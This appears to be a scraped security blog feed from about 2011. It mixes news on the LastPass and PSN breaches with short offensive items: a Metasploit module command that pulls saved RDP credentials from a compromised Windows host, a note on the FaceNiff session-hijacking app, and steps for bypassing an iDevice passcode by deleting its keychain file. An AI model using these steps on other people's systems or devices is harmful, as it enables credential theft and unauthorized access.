Just finished a new module for metasploit meterpreter post-exploitation
Once you gain a meterpreter session just run
run post/windows/gather/enum_rdp_pwd
meterpreter > run post/windows/gather/enum_rdp_pwd
[*] Searching for *.rdp files in C:\Users\Will\Documents
[*] Found: C:\Users\Will\Documents\Default.rdp
[*] Host: 10.1.10.8
[*] User: Administrator
[*] Pass: metasploit
(more…)
In his last update to Big Brother Camera Security, Daniel Amitay added some code to record common user passcodes. Because Big Brother’s passcode setup screen and lock screen are nearly identical to those of the actual iPhone passcode lock, Daniel figured that the collected information would closely correlate with actual iPhone passcodes. Out of 204,508 recorded passcodes, the top ten most common were:
[1234, 0000, 2580, 1111, 5555, 5683, 0852, 2222, 1212, 1998]
Source: amitay.us
FaceNiff is an Android app that allows you to sniff and intercept web session profiles over the WiFi that your mobile is connected to.
It is possible to hijack sessions only when WiFi is not using EAP, but it should work over any private networks (Open/WEP/WPA-PSK/WPA2-PSK)
It’s kind of like Firesheep for android. Your phone must be rooted to use this program.
Originally it started off for just Facebook but the author has added support for these other sites: FaceBook,Twitter,Youtube,Amazon,Nasza-Klasa
Password management system LastPass has reset users’ master passwords as a precaution following the discovery of a possible hack attack against its systems.
The move follows the detection of two anomalies – one affecting a database server – on LastPass’s network on Tuesday that could be the result of a possible hack attack. LastPass detected that more traffic had been sent from the database than had been received by a server, an event that might be explained by hackers extracting sensitive login credentials, stored in an obfuscated (hashed) format.
The worst case scenario is that miscreants might have swiped password hashes, a development that leaves users who selected easier-to-guess passphrases at risk of brute-force dictionary attacks. Once uncovered, these login credentials might be used to obtain access to all the login credentials stored through the service, as LastPass explains in a blog post (extract below).
If you have a strong, non-dictionary-based password or pass phrase, this shouldn’t impact you – the potential threat here is brute-forcing your master password using dictionary words, then going to LastPass with that password to get your data. Unfortunately not everyone picks a master password that’s immune to brute-forcing.To counter that potential threat, we’re going to force everyone to change their master passwords. Additionally, we’re going to want an indication that you’re you, by either ensuring that you’re coming from an IP block you’ve used before or by validating your email address…
We realise this may be an overreaction and we apologise for the disruption this will cause, but we’d rather be paranoid and slightly inconvenience you than to be even more sorry later.
LastPass’s decision to reset passwords as a precaution has made it difficult for some legitimate users to log onto the service again. Tips on re-enabling accounts can be found in a blog post by Chris Boyd, a security researcher at GFI Software, here.
The password-management outfit has taken the possible attack and resulting service disruption as the opportunity to introduce a stronger password hashing system. Although LastPass isn’t sure how hackers might have entered its network – if indeed that’s what happened – an assault based on an initial break-in via its Voice over IP system is the company’s best initial guess as to what might have gone wrong.
This week’s security flap at LastPass.com follows a security breach just six weeks ago that created a means to extract the email addresses – though not the passwords – of enrolled users. The two incidents are not thought to be related.
Source: theregister.co.uk
UPDATE: We received a small chunk of the compromised passwords, check to see if your name is on this list
Sony has some bad news for PSN users, confirming that PSN personal information is “believed” to be in the hands of an “unauthorized person.” Users who use the same password for multiple accounts should make immediate changes to all of their online accounts.
Sony has confirmed that the PSN outage by what it called an “external intrusion” a few days ago has resulted in the theft of the personal information of the roughly 70 million active PSN accounts. A post today on the PlayStation Blog by Senior Director of Corporate Communications and Social Media Patrick Seybold said that as early as April 17 account information may have been stolen.
“We have discovered that between April 17 and April 19, 2011, certain PlayStation Network and Qriocity service user account information was compromised in connection with an illegal and unauthorized intrusion into our network,” Seybold wrote.
There is a laundry list of compromised personal information, including the loss of logins, passwords, street addresses, and purchase histories. Even credit card information could be at risk, though Sony is “no evidence” theft of credit card information occurred.
Although we are still investigating the details of this incident, we believe that an unauthorized person has obtained the following information that you provided: name, address (city, state, zip), country, email address, birthdate, PlayStation Network/Qriocity password and login, and handle/PSN online ID. It is also possible that your profile data, including purchase history and billing address (city, state, zip), and your PlayStation Network/Qriocity password security answers may have been obtained. If you have authorized a sub-account for your dependent, the same data with respect to your dependent may have been obtained. While there is no evidence at this time that credit card data was taken, we cannot rule out the possibility. If you have provided your credit card data through PlayStation Network or Qriocity, out of an abundance of caution we are advising you that your credit card number (excluding security code) and expiration date may have been obtained (emphasis added).
In response to the intrusion, Seybold wrote that Sony turned off the PSN, contacted an outside security firm for assistance, and quickly stepped up efforts to strengthen PSN infrastructure.
Change your passwords, keep careful note of charges to your accounts, and keep an extra eye out for things out of place with your personal accounts. Stay tuned to gamrFeed for further updates.
Source: PlayStation Blog
Tickets are on sale now for eXcon and BSidesCT security conference.
June 11th 2011 , located Meriden, CT
It’s only 2hrs from either Boston or NYC.
http://exconference.com
If you want to attend or speak at the conference hit their email up on the site!!!
These steps use phpMyAdmin and the WordPress database to reset your password.
Step 1: Go to your Website Control Panel and open phpMyAdmin.
Step 2: While in phpMyAdmin, select your WordPress Database and select the wp_users table, (this is the table that holds all of your usernames)
Step 3: Select your username from the list and click the EDIT icon.
Step 4: The WordPress stores users passwords in the encrypted MD5 format, so to change our password we must first encrypt it into a MD5 hash.
If you are on linux you can do a quick command of:
md5sum <<<“MyPassword789456321$#”
Copy the generated MD5 hash code and go back to the EDIT user page which you opened in Step 3 and paste the MD5 hash in the “user_pass” box and click “Go“.
Now, your WordPress Admin Password should be changed.
Go to http://yoursite.com/wp-admin/ and login with your new password.
Ducati Diavel ignition starts with password only, with no key. The password is last 4 of VIN on all models.
The following tutorial explains how to access an iPhone, iPad or iPod which is password protected.
If you are a Windows user, just download the free s/w iPhone Browser : http://www.brothersoft.com/iphonebrowser-download-190579.html
Connect the device {iPhone,iPod,iPad} and go to the following location.
var/keychains and delete the file, keychain-2.db
Once done, restart the device by pressing down and holding the home button+sleep button for 10 sec. and release when you see the black screen then after 3 sec, press the sleep/power button once
Your idevice will boot up but this time it will not ask for the password as we have deleted the database record for password.
